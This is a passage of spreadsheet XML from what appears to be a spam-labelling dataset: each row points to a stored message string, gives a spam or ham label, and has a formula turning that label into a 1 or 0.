    <row r="5195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5195" t="s">
        <v>10131</v>
      </c>
      <c r="B5195" t="s">
        <v>5294</v>
      </c>
      <c r="C5195" s="1">
        <f>IF(B5195="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5196" t="s">
        <v>10132</v>
      </c>
      <c r="B5196" t="s">
        <v>5294</v>
      </c>
      <c r="C5196" s="1">
        <f>IF(B5196="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5197" t="s">
        <v>10133</v>
      </c>
      <c r="B5197" t="s">
        <v>5294</v>
      </c>
      <c r="C5197" s="1">
        <f>IF(B5197="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5198" t="s">
        <v>10134</v>
      </c>
      <c r="B5198" t="s">
        <v>5297</v>
      </c>
      <c r="C5198" s="1">
        <f>IF(B5198="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5199" t="s">
        <v>10135</v>
      </c>
      <c r="B5199" t="s">
        <v>5294</v>
      </c>
      <c r="C5199" s="1">
        <f>IF(B5199="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5200" t="s">
        <v>10136</v>
      </c>
      <c r="B5200" t="s">
        <v>5294</v>
      </c>
      <c r="C5200" s="1">
        <f>IF(B5200="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5201" t="s">
        <v>10137</v>
      </c>
      <c r="B5201" t="s">
        <v>5294</v>
      </c>
      <c r="C5201" s="1">
        <f>IF(B5201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5202" t="s">
        <v>10138</v>
      </c>
      <c r="B5202" t="s">
        <v>5297</v>
      </c>
      <c r="C5202" s="1">
        <f>IF(B5202="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5203" t="s">
        <v>10083</v>
      </c>
      <c r="B5203" t="s">
        <v>5297</v>
      </c>
      <c r="C5203" s="1">
        <f>IF(B5203="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5204" t="s">
        <v>10139</v>
      </c>
      <c r="B5204" t="s">
        <v>5294</v>
      </c>
      <c r="C5204" s="1">
        <f>IF(B5204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5205" t="s">
        <v>9387</v>
      </c>
      <c r="B5205" t="s">
        <v>5294</v>
      </c>
      <c r="C5205" s="1">
        <f>IF(B5205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5206" t="s">
        <v>10140</v>
      </c>
      <c r="B5206" t="s">
        <v>5294</v>
      </c>
      <c r="C5206" s="1">
        <f>IF(B5206="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5207" t="s">
        <v>10141</v>
      </c>
      <c r="B5207" t="s">
        <v>5297</v>
      </c>
      <c r="C5207" s="1">
        <f>IF(B5207="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5208" t="s">
        <v>8747</v>
      </c>
      <c r="B5208" t="s">
        <v>5294</v>
      </c>
      <c r="C5208" s="1">
        <f>IF(B5208="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5209" t="s">
        <v>10142</v>
      </c>
      <c r="B5209" t="s">
        <v>5294</v>
      </c>
      <c r="C5209" s="1">
        <f>IF(B5209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5210" t="s">
        <v>10143</v>
      </c>
      <c r="B5210" t="s">
        <v>5294</v>
      </c>
      <c r="C5210" s="1">
        <f>IF(B5210="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5211" t="s">
        <v>10144</v>
      </c>
      <c r="B5211" t="s">
        <v>5294</v>
      </c>
      <c r="C5211" s="1">
        <f>IF(B5211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5212" t="s">
        <v>10145</v>
      </c>
      <c r="B5212" t="s">
        <v>5294</v>
      </c>
      <c r="C5212" s="1">
        <f>IF(B5212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5213" t="s">
        <v>10146</v>
      </c>
      <c r="B5213" t="s">
        <v>5294</v>
      </c>
      <c r="C5213" s="1">
        <f>IF(B5213="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5214" t="s">
        <v>10147</v>
      </c>
      <c r="B5214" t="s">
        <v>5294</v>
      </c>
      <c r="C5214" s="1">
        <f>IF(B5214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5215" t="s">
        <v>10148</v>
      </c>
      <c r="B5215" t="s">
        <v>5294</v>
      </c>
      <c r="C5215" s="1">
        <f>IF(B5215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5216" t="s">
        <v>9295</v>
      </c>
      <c r="B5216" t="s">
        <v>5297</v>
      </c>
      <c r="C5216" s="1">
        <f>IF(B5216="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5217" t="s">
        <v>9331</v>
      </c>
      <c r="B5217" t="s">
        <v>5294</v>
      </c>
      <c r="C5217" s="1">
        <f>IF(B5217="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5218" t="s">
        <v>6813</v>
      </c>
      <c r="B5218" t="s">
        <v>5294</v>
      </c>
      <c r="C5218" s="1">
        <f>IF(B5218="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5219" t="s">
        <v>10149</v>
      </c>
      <c r="B5219" t="s">
        <v>5294</v>
      </c>
      <c r="C5219" s="1">
        <f>IF(B5219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5220" t="s">
        <v>10150</v>
      </c>
      <c r="B5220" t="s">
        <v>5294</v>
      </c>
      <c r="C5220" s="1">
        <f>IF(B5220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5221" t="s">
        <v>10151</v>
      </c>
      <c r="B5221" t="s">
        <v>5294</v>
      </c>
      <c r="C5221" s="1">
        <f>IF(B5221="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5222" t="s">
        <v>10152</v>
      </c>
      <c r="B5222" t="s">
        <v>5294</v>
      </c>
      <c r="C5222" s="1">
        <f>IF(B5222="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5223" t="s">
        <v>10153</v>
      </c>
      <c r="B5223" t="s">
        <v>5294</v>
      </c>
      <c r="C5223" s="1">
        <f>IF(B5223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5224" t="s">
        <v>10154</v>
      </c>
      <c r="B5224" t="s">
        <v>5294</v>
      </c>
      <c r="C5224" s="1">
        <f>IF(B5224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5225" t="s">
        <v>10155</v>
      </c>
      <c r="B5225" t="s">
        <v>5294</v>
      </c>
      <c r="C5225" s="1">
        <f>IF(B5225="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5226" t="s">
        <v>10156</v>
      </c>
      <c r="B5226" t="s">
        <v>5294</v>
      </c>
      <c r="C5226" s="1">
        <f>IF(B5226="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5227" t="s">
        <v>5388</v>
      </c>
      <c r="B5227" t="s">
        <v>5294</v>
      </c>
      <c r="C5227" s="1">
        <f>IF(B5227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5228" t="s">
        <v>5799</v>
      </c>
      <c r="B5228" t="s">
        <v>5294</v>
      </c>
      <c r="C5228" s="1">
        <f>IF(B5228="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5229" t="s">
        <v>10157</v>
      </c>
      <c r="B5229" t="s">
        <v>5294</v>
      </c>
      <c r="C5229" s="1">
        <f>IF(B5229="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5230" t="s">
        <v>10158</v>
      </c>
      <c r="B5230" t="s">
        <v>5297</v>
      </c>
      <c r="C5230" s="1">
        <f>IF(B5230="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5231" t="s">
        <v>10159</v>
      </c>
      <c r="B5231" t="s">
        <v>5294</v>
      </c>
      <c r="C5231" s="1">
        <f>IF(B5231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5232" t="s">
        <v>10160</v>
      </c>
      <c r="B5232" t="s">
        <v>5294</v>
      </c>
      <c r="C5232" s="1">
        <f>IF(B5232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5233" t="s">
        <v>10161</v>
      </c>
      <c r="B5233" t="s">
        <v>5294</v>
      </c>
      <c r="C5233" s="1">
        <f>IF(B5233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5234" t="s">
        <v>9086</v>
      </c>
      <c r="B5234" t="s">
        <v>5297</v>
      </c>
      <c r="C5234" s="1">
        <f>IF(B5234="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5235" t="s">
        <v>10162</v>
      </c>
      <c r="B5235" t="s">
        <v>5294</v>
      </c>
      <c r="C5235" s="1">
        <f>IF(B5235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5236" t="s">
        <v>10163</v>
      </c>
      <c r="B5236" t="s">
        <v>5294</v>
      </c>
      <c r="C5236" s="1">
        <f>IF(B5236="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5237" t="s">
        <v>10164</v>
      </c>
      <c r="B5237" t="s">
        <v>5294</v>
      </c>
      <c r="C5237" s="1">
        <f>IF(B5237="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5238" t="s">
        <v>5797</v>
      </c>
      <c r="B5238" t="s">
        <v>5294</v>
      </c>
      <c r="C5238" s="1">
        <f>IF(B5238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5239" t="s">
        <v>10165</v>
      </c>
      <c r="B5239" t="s">
        <v>5297</v>
      </c>
      <c r="C5239" s="1">
        <f>IF(B5239="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5240" t="s">
        <v>10166</v>
      </c>
      <c r="B5240" t="s">
        <v>5294</v>
      </c>
      <c r="C5240" s="1">
        <f>IF(B5240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5241" t="s">
        <v>10167</v>
      </c>
      <c r="B5241" t="s">
        <v>5294</v>
      </c>
      <c r="C5241" s="1">
        <f>IF(B5241="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5242" t="s">
        <v>10168</v>
      </c>
      <c r="B5242" t="s">
        <v>5294</v>
      </c>
      <c r="C5242" s="1">
        <f>IF(B5242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5243" t="s">
        <v>5358</v>
      </c>
      <c r="B5243" t="s">
        <v>5294</v>
      </c>
      <c r="C5243" s="1">
        <f>IF(B5243="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5244" t="s">
        <v>10169</v>
      </c>
      <c r="B5244" t="s">
        <v>5294</v>
      </c>
      <c r="C5244" s="1">
        <f>IF(B5244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5245" t="s">
        <v>10170</v>
      </c>
      <c r="B5245" t="s">
        <v>5294</v>
      </c>
      <c r="C5245" s="1">
        <f>IF(B5245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5246" t="s">
        <v>10171</v>
      </c>
      <c r="B5246" t="s">
        <v>5294</v>
      </c>
      <c r="C5246" s="1">
        <f>IF(B5246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5247" t="s">
        <v>10172</v>
      </c>
      <c r="B5247" t="s">
        <v>5294</v>
      </c>
      <c r="C5247" s="1">
        <f>IF(B5247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5248" t="s">
        <v>10173</v>
      </c>
      <c r="B5248" t="s">
        <v>5294</v>
      </c>
      <c r="C5248" s="1">
        <f>IF(B5248="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5249" t="s">
        <v>10024</v>
      </c>
      <c r="B5249" t="s">
        <v>5294</v>
      </c>
      <c r="C5249" s="1">
        <f>IF(B5249="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5250" t="s">
        <v>10174</v>
      </c>
      <c r="B5250" t="s">
        <v>5294</v>
      </c>
      <c r="C5250" s="1">
        <f>IF(B5250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5251" t="s">
        <v>10175</v>
      </c>
      <c r="B5251" t="s">
        <v>5294</v>
      </c>
      <c r="C5251" s="1">
        <f>IF(B5251="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5252" t="s">
        <v>10176</v>
      </c>
      <c r="B5252" t="s">
        <v>5297</v>
      </c>
      <c r="C5252" s="1">
        <f>IF(B5252="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5253" t="s">
        <v>10177</v>
      </c>
      <c r="B5253" t="s">
        <v>5294</v>
      </c>
      <c r="C5253" s="1">
        <f>IF(B5253="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5254" t="s">
        <v>10178</v>
      </c>
      <c r="B5254" t="s">
        <v>5294</v>
      </c>
      <c r="C5254" s="1">
        <f>IF(B5254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5255" t="s">
        <v>10179</v>
      </c>
      <c r="B5255" t="s">
        <v>5294</v>
      </c>
      <c r="C5255" s="1">
        <f>IF(B5255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5256" t="s">
        <v>10180</v>
      </c>
      <c r="B5256" t="s">
        <v>5294</v>
      </c>
      <c r="C5256" s="1">
        <f>IF(B5256="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5257" t="s">
        <v>10181</v>
      </c>
      <c r="B5257" t="s">
        <v>5294</v>
      </c>
      <c r="C5257" s="1">
        <f>IF(B5257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5258" t="s">
        <v>10182</v>
      </c>
      <c r="B5258" t="s">
        <v>5294</v>
      </c>
      <c r="C5258" s="1">
        <f>IF(B5258="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5259" t="s">
        <v>7784</v>
      </c>
      <c r="B5259" t="s">
        <v>5294</v>
      </c>
      <c r="C5259" s="1">
        <f>IF(B5259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5260" t="s">
        <v>10183</v>
      </c>
      <c r="B5260" t="s">
        <v>5294</v>
      </c>
      <c r="C5260" s="1">
        <f>IF(B5260="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5261" t="s">
        <v>10184</v>
      </c>
      <c r="B5261" t="s">
        <v>5294</v>
      </c>
      <c r="C5261" s="1">
        <f>IF(B5261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5262" t="s">
        <v>10185</v>
      </c>
      <c r="B5262" t="s">
        <v>5294</v>
      </c>
      <c r="C5262" s="1">
        <f>IF(B5262="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5263" t="s">
        <v>10186</v>
      </c>
      <c r="B5263" t="s">
        <v>5294</v>
      </c>
      <c r="C5263" s="1">
        <f>IF(B5263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5264" t="s">
        <v>10187</v>
      </c>
      <c r="B5264" t="s">
        <v>5294</v>
      </c>
      <c r="C5264" s="1">
        <f>IF(B5264="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5265" t="s">
        <v>10188</v>
      </c>
      <c r="B5265" t="s">
        <v>5294</v>
      </c>
      <c r="C5265" s="1">
        <f>IF(B5265="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5266" t="s">
        <v>6639</v>
      </c>
      <c r="B5266" t="s">
        <v>5294</v>
      </c>
      <c r="C5266" s="1">
        <f>IF(B5266="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5267" t="s">
        <v>10189</v>
      </c>
      <c r="B5267" t="s">
        <v>5294</v>
      </c>
      <c r="C5267" s="1">
        <f>IF(B5267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5268" t="s">
        <v>10190</v>
      </c>
      <c r="B5268" t="s">
        <v>5294</v>
      </c>
      <c r="C5268" s="1">
        <f>IF(B5268="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5269" t="s">
        <v>10191</v>
      </c>
      <c r="B5269" t="s">
        <v>5294</v>
      </c>
      <c r="C5269" s="1">
        <f>IF(B5269="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5270" t="s">
        <v>10192</v>
      </c>
      <c r="B5270" t="s">
        <v>5294</v>
      </c>
      <c r="C5270" s="1">
        <f>IF(B5270="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5271" t="s">
        <v>10193</v>
      </c>
      <c r="B5271" t="s">
        <v>5297</v>
      </c>
      <c r="C5271" s="1">
        <f>IF(B5271="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5272" t="s">
        <v>10194</v>
      </c>
      <c r="B5272" t="s">
        <v>5294</v>
      </c>
      <c r="C5272" s="1">
        <f>IF(B5272="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5273" t="s">
        <v>10195</v>
      </c>
      <c r="B5273" t="s">
        <v>5294</v>
      </c>
      <c r="C5273" s="1">
        <f>IF(B5273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5274" t="s">
        <v>10196</v>
      </c>
      <c r="B5274" t="s">
        <v>5294</v>
      </c>
      <c r="C5274" s="1">
        <f>IF(B5274="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5275" t="s">
        <v>10197</v>
      </c>
      <c r="B5275" t="s">
        <v>5294</v>
      </c>
      <c r="C5275" s="1">
        <f>IF(B5275="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5276" t="s">
        <v>10198</v>
      </c>
      <c r="B5276" t="s">
        <v>5294</v>
      </c>
      <c r="C5276" s="1">
        <f>IF(B5276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5277" t="s">
        <v>10199</v>
      </c>
      <c r="B5277" t="s">
        <v>5294</v>
      </c>
      <c r="C5277" s="1">
        <f>IF(B5277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5278" t="s">
        <v>10200</v>
      </c>
      <c r="B5278" t="s">
        <v>5294</v>
      </c>
      <c r="C5278" s="1">
        <f>IF(B5278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5279" t="s">
        <v>10201</v>
      </c>
      <c r="B5279" t="s">
        <v>5294</v>
      </c>
      <c r="C5279" s="1">
        <f>IF(B5279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5280" t="s">
        <v>10202</v>
      </c>
      <c r="B5280" t="s">
        <v>5297</v>
      </c>
      <c r="C5280" s="1">
        <f>IF(B5280="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5281" t="s">
        <v>8060</v>
      </c>
      <c r="B5281" t="s">
        <v>5294</v>
      </c>
      <c r="C5281" s="1">
        <f>IF(B5281="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5282" t="s">
        <v>10203</v>
      </c>
      <c r="B5282" t="s">
        <v>5294</v>
      </c>
      <c r="C5282" s="1">
        <f>IF(B5282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5283" t="s">
        <v>10204</v>
      </c>
      <c r="B5283" t="s">
        <v>5294</v>
      </c>
      <c r="C5283" s="1">
        <f>IF(B5283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5284" t="s">
        <v>10205</v>
      </c>
      <c r="B5284" t="s">
        <v>5294</v>
      </c>
      <c r="C5284" s="1">
        <f>IF(B5284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5285" t="s">
        <v>10206</v>
      </c>
      <c r="B5285" t="s">
        <v>5294</v>
      </c>
      <c r="C5285" s="1">
        <f>IF(B5285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5286" t="s">
        <v>7060</v>
      </c>
      <c r="B5286" t="s">
        <v>5294</v>
      </c>
      <c r="C5286" s="1">
        <f>IF(B5286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5287" t="s">
        <v>5308</v>
      </c>
      <c r="B5287" t="s">
        <v>5297</v>
      </c>
      <c r="C5287" s="1">
        <f>IF(B5287="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5288" t="s">
        <v>10207</v>
      </c>
      <c r="B5288" t="s">
        <v>5294</v>
      </c>
      <c r="C5288" s="1">
        <f>IF(B5288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5289" t="s">
        <v>10208</v>
      </c>
      <c r="B5289" t="s">
        <v>5294</v>
      </c>
      <c r="C5289" s="1">
        <f>IF(B5289="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5290" t="s">
        <v>10209</v>
      </c>
      <c r="B5290" t="s">
        <v>5294</v>
      </c>
      <c r="C5290" s="1">
        <f>IF(B5290="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5291" t="s">
        <v>10210</v>
      </c>
      <c r="B5291" t="s">
        <v>5294</v>
      </c>
      <c r="C5291" s="1">
        <f>IF(B5291="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5292" t="s">
        <v>10211</v>
      </c>
      <c r="B5292" t="s">
        <v>5294</v>
      </c>
      <c r="C5292" s="1">
        <f>IF(B5292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5293" t="s">
        <v>10212</v>
      </c>
      <c r="B5293" t="s">
        <v>5294</v>
      </c>
      <c r="C5293" s="1">
        <f>IF(B5293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5294" t="s">
        <v>10213</v>
      </c>
      <c r="B5294" t="s">
        <v>5297</v>
      </c>
      <c r="C5294" s="1">
        <f>IF(B5294="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5295" t="s">
        <v>10214</v>
      </c>
      <c r="B5295" t="s">
        <v>5294</v>
      </c>
      <c r="C5295" s="1">
        <f>IF(B5295="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5296" t="s">
        <v>10215</v>
      </c>
      <c r="B5296" t="s">
        <v>5297</v>
      </c>
      <c r="C5296" s="1">
        <f>IF(B5296="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5297" t="s">
        <v>10216</v>
      </c>
      <c r="B5297" t="s">
        <v>5294</v>
      </c>
      <c r="C5297" s="1">
        <f>IF(B5297="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5298" t="s">
        <v>10217</v>
      </c>
      <c r="B5298" t="s">
        <v>5294</v>
      </c>
      <c r="C5298" s="1">
        <f>IF(B5298="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
